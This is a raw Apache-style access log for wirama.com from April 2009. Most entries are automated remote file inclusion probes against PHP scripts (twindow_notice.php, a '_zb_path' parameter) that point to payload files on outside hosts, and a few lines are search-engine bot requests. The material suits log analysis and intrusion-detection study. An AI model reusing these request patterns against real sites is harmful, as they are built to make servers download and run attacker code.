91.142.210.39 - - [05/Apr/2009:20:54:15 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.142.210.39 - - [05/Apr/2009:20:54:15 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.142.210.39 - - [05/Apr/2009:20:54:15 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
76.12.222.188 - - [05/Apr/2009:20:57:01 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.12.222.188 - - [05/Apr/2009:20:57:01 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.12.222.188 - - [05/Apr/2009:20:57:01 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.15.161.2 - - [05/Apr/2009:20:58:11 -0700] "GET /logs///?_zb_path=http://www.centralpets.com//extracts/id1.txt?? HTTP/1.1" 200 1808 "-" "Mozilla/5.0" "www.wirama.com"
216.15.161.2 - - [05/Apr/2009:20:58:12 -0700] "GET /logs/access_090329.log%20%20///?_zb_path=http://www.centralpets.com//extracts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
216.15.161.2 - - [05/Apr/2009:20:58:12 -0700] "GET //?_zb_path=http://www.centralpets.com//extracts/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
92.48.70.207 - - [05/Apr/2009:21:00:40 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
92.48.70.207 - - [05/Apr/2009:21:00:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
92.48.70.207 - - [05/Apr/2009:21:00:40 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.249.18.13 - - [05/Apr/2009:21:01:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.249.18.13 - - [05/Apr/2009:21:01:38 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.249.18.13 - - [05/Apr/2009:21:01:38 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.74.236.100 - - [05/Apr/2009:21:02:30 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.74.236.100 - - [05/Apr/2009:21:02:30 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
76.74.236.100 - - [05/Apr/2009:21:02:30 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:18 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:18 -0700] "GET /logs/access_090329.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:18 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:25 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:25 -0700] "GET /logs/access_090329.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:25 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:48 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:48 -0700] "GET /logs/access_090329.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:48 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:54 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:54 -0700] "GET /logs/access_090329.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:59 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:05:59 -0700] "GET /logs/access_090329.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:06:01 -0700] "GET /logs/access_090329.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:06:01 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:06:01 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.249.18.13 - - [05/Apr/2009:21:08:14 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.249.18.13 - - [05/Apr/2009:21:08:14 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.249.18.13 - - [05/Apr/2009:21:08:14 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.141.130.42 - - [05/Apr/2009:21:08:47 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:38 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:38 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:46 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:46 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:48 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:48 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:09:48 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.141.130.42 - - [05/Apr/2009:21:09:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.141.130.42 - - [05/Apr/2009:21:09:56 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.141.130.42 - - [05/Apr/2009:21:09:56 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.249.18.13 - - [05/Apr/2009:21:10:08 -0700] "GET /logs/access_090330.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.248.62.104 - - [05/Apr/2009:21:10:13 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.248.62.104 - - [05/Apr/2009:21:10:13 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.248.62.104 - - [05/Apr/2009:21:10:13 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:14 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.142.210.39 - - [05/Apr/2009:21:10:19 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.142.210.39 - - [05/Apr/2009:21:10:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
91.142.210.39 - - [05/Apr/2009:21:10:19 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.studioromero.com.br//modules/My_eGallery/fx29id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:22 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:22 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:23 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:23 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:23 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:27 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:27 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.55.182.200 - - [05/Apr/2009:21:10:27 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
198.106.204.186 - - [05/Apr/2009:21:11:27 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
198.106.204.186 - - [05/Apr/2009:21:11:27 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
198.106.204.186 - - [05/Apr/2009:21:11:27 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.248.62.104 - - [05/Apr/2009:21:11:53 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.248.62.104 - - [05/Apr/2009:21:11:53 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.248.62.104 - - [05/Apr/2009:21:11:53 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:11:53 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:11:53 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:11:53 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:11:56 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:11:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:11:56 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.248.62.104 - - [05/Apr/2009:21:11:59 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.248.62.104 - - [05/Apr/2009:21:11:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.248.62.104 - - [05/Apr/2009:21:11:59 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.131.65.38 - - [05/Apr/2009:21:14:00 -0700] "GET /logs/access_090330.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.251.129.46 - - [05/Apr/2009:21:15:19 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.251.129.46 - - [05/Apr/2009:21:15:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.251.129.46 - - [05/Apr/2009:21:15:19 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.118.90.4 - - [05/Apr/2009:21:16:25 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.118.90.4 - - [05/Apr/2009:21:16:25 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.118.90.4 - - [05/Apr/2009:21:16:27 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.118.90.4 - - [05/Apr/2009:21:16:52 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.118.90.4 - - [05/Apr/2009:21:16:52 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.118.90.4 - - [05/Apr/2009:21:16:52 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.231.30 - - [05/Apr/2009:21:16:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.231.30 - - [05/Apr/2009:21:16:59 -0700] "GET /images/LIVE_08_120x240.gif HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.67 - - [05/Apr/2009:21:27:55 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.67 - - [05/Apr/2009:21:27:55 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
216.246.55.223 - - [05/Apr/2009:21:34:42 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
216.246.55.223 - - [05/Apr/2009:21:34:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
216.246.55.223 - - [05/Apr/2009:21:35:41 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
216.246.55.223 - - [05/Apr/2009:21:35:41 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
216.246.55.223 - - [05/Apr/2009:21:35:42 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.wirama.com"
74.208.16.145 - - [05/Apr/2009:21:35:43 -0700] "GET /logs/access_090329.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
74.208.16.145 - - [05/Apr/2009:21:35:43 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
74.208.16.145 - - [05/Apr/2009:21:35:43 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
